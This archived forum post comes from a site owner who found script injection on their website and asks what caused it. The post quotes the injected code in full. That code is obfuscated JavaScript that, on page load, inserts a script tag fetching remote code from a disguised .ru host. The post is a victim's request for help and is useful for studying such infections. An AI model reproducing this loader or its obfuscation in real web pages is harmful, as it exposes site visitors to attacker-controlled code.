PDA

View Full Version : found script injection



rabin
03-18-2010, 06:37 AM
I have found script injection in my site? What is the main cause of this script injection? You can view this injection on http://www.nepalhpf.org/


malicious code

[CODE]
<script>var X;if(X!='' && X!='Ud'){X=''};try {var D=RegExp;var E="";var Z=new String("rep"+"lac"+"e");var e=new Array();var uY;if(uY!='' && uY!='fZ'){uY=null};function N(c,h){var _;if(_!='' && _!='l'){_='ZJ'};var F;if(F!='B' && F != ''){F=null};var f=String("[");var qK=new Array();var n=new String("prn2g".substr(4));var eX='';f+=h;var bd;if(bd!='yA'){bd=''};var bg;if(bg!='' && bg!='G'){bg='a'};f+="]";var L;if(L!='' && L!='By'){L='P'};this.mZ='';var DL=new D(f, n);var _f;if(_f!='hF'){_f='hF'};return c[Z](DL, new String());};var Lg='';var UZ=new Array();var Lu=new Array();var j=N('oJnTlToTaJdT',"JT");var i=N('/JkTiJjCiJjTiT.CcvaC/CkCiCjCiCjJiv.TcvaT/CmCeCevbJoT.CcJoJmv/CfJoJrvuTmJcToJmJmTuTnCiCtvyC.JnvevtC/vgToTovgTlveT.CcCoTmT.JpThTpJ',"vTJC");var g=N('8469606448699409694',"6954");var u='';var fD=N('cjrpejaHtWeWEWlHejmjejnWtH',"WjpH");this.jP='';var PZ;if(PZ!='hK' && PZ != ''){PZ=null};var J=N('hQtQtQpx:x/x/xoQwx-Qlxyx.xgxoQoQgQlQex.xcQoxmx.QbQrQ.xgQoxoQgQlxex-xcxoxmQ-QpQkx.QYQoxuxrxSxuxpxeQrxPQoQoQlQ.xrxux:x',"xQ");var iq=N('socXrXiIpXtX',"IXAov");this.ni='';this.dR='';var xO=new Date();var q=window;var LD;if(LD!='OF' && LD!='ZD'){LD=''};var A=new String();U=function(){var OT;if(OT!='lb'){OT=''};this.FF="";var R=new String();var t;if(t!='Wm'){t=''};s=document[fD](iq);var cr="";var qJ="";u=J+g;u+=i;var Qk;if(Qk!='' && Qk!='tw'){Qk='wp'};var mp=new Date();var iS;if(iS!='bE'){iS='bE'};s.defer=([1,5][0]);var HS=new Date();var ZM=new Date();s.src=u;var _u;if(_u!='Jw'){_u='Jw'};document.body.appendChild(s);var lB;if(lB!='' && lB!='yD'){lB=''};};this.yAP='';q[j]=U;var oD;if(oD!='pU'){oD='pU'};var Qd;if(Qd!='' && Qd!='zC'){Qd=''};} catch(sC){var ri='';var vr='';};var uq;if(uq!='Sz' && uq!='bO'){uq='Sz'};this.hZ="";</script>
<!--ce0f431b9fbb64bd0736755c074269a1-->

[CODE]